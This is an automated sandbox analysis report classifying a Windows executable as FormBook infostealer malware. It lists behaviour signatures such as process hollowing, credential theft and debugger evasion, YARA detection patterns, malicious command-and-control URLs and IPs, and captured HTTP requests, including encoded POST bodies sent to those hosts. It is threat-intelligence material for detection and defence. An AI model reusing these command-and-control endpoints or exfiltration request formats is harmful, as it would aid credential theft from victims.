Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
535276_86376.exe

Overview

General Information

Sample Name:535276_86376.exe
Analysis ID:873585
MD5:fde32a46de11df3e8e61fea0e21eb144
SHA1:c6d7194a4095ccfad4660e00bc7dd290e802b894
SHA256:4690616c9b7b3d211237ffb3c8d981027e6a9894ab5a27f584828b67585a9886
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 535276_86376.exe (PID: 6876 cmdline: C:\Users\user\Desktop\535276_86376.exe MD5: FDE32A46DE11DF3E8E61FEA0E21EB144)
    • 535276_86376.exe (PID: 6988 cmdline: C:\Users\user\Desktop\535276_86376.exe MD5: FDE32A46DE11DF3E8E61FEA0E21EB144)
    • 535276_86376.exe (PID: 6960 cmdline: C:\Users\user\Desktop\535276_86376.exe MD5: FDE32A46DE11DF3E8E61FEA0E21EB144)
    • 535276_86376.exe (PID: 6992 cmdline: C:\Users\user\Desktop\535276_86376.exe MD5: FDE32A46DE11DF3E8E61FEA0E21EB144)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 4744 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1832f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x20df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcbe2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.535276_86376.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.535276_86376.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcbe2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.535276_86376.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7ad:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fb9a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b4d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.535276_86376.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.535276_86376.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x1fff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbde2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 535276_86376.exeReversingLabs: Detection: 16%
          Source: 535276_86376.exeVirustotal: Detection: 32%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: https://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3Avira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.comAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.42230.org/bpg5/www.42230.orgjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/www.rt66omm.comjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.infoAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.bizAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/www.gomarketing.infojdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/www.vns96.netjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/www.antalyabfe.comjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.comAvira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/www.jhg61.comjdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZmAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.gomarketing.infoVirustotal: Detection: 7%Perma Link
          Machine Learning detection for sample
          Source: 535276_86376.exeJoe Sandbox ML: detected
          Source: 535276_86376.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 535276_86376.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: systray.pdb source: 535276_86376.exe, 00000003.00000002.454773362.0000000001020000.00000040.10000000.00040000.00000000.sdmp, 535276_86376.exe, 00000003.00000002.454471972.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: 535276_86376.exe, 00000003.00000002.454773362.0000000001020000.00000040.10000000.00040000.00000000.sdmp, 535276_86376.exe, 00000003.00000002.454471972.0000000000B5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 535276_86376.exe, 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.410209844.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.413985975.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000003.454471268.00000000048BA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 535276_86376.exe, 535276_86376.exe, 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.410209844.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000003.00000003.413985975.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000003.454471268.00000000048BA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rHJD.pdb source: 535276_86376.exe, 00000000.00000000.386434838.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000006.00000002.668081280.00000000151E3000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000006.00000000.446131411.00007FFA13021000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: rHJD.pdbSHA256 source: 535276_86376.exe, 00000000.00000000.386434838.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000006.00000002.668081280.00000000151E3000.00000004.80000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeDomain query: www.antalyabfe.com
          Source: C:\Windows\explorer.exeDomain query: www.rt66omm.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.125.172 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jhg61.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.228.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.129.40.9 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.haynicorpon.biz
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZm HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZm HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZm HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZm HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
          Source: Joe Sandbox ViewIP Address: 188.114.97.7 188.114.97.7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 52 34 37 43 79 41 31 54 45 32 6c 65 6c 4c 36 6d 44 78 73 44 74 49 4e 36 61 43 79 6e 69 54 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 79 6b 4e 33 79 55 65 31 6d 55 30 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yDcF=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySrykN3yUe1mU0jCk1jMg).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 68 6d 4c 39 6e 41 7a 77 71 77 68 71 4a 66 47 74 4f 52 6c 52 57 67 4e 61 69 31 44 66 45 54 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 43 75 77 4
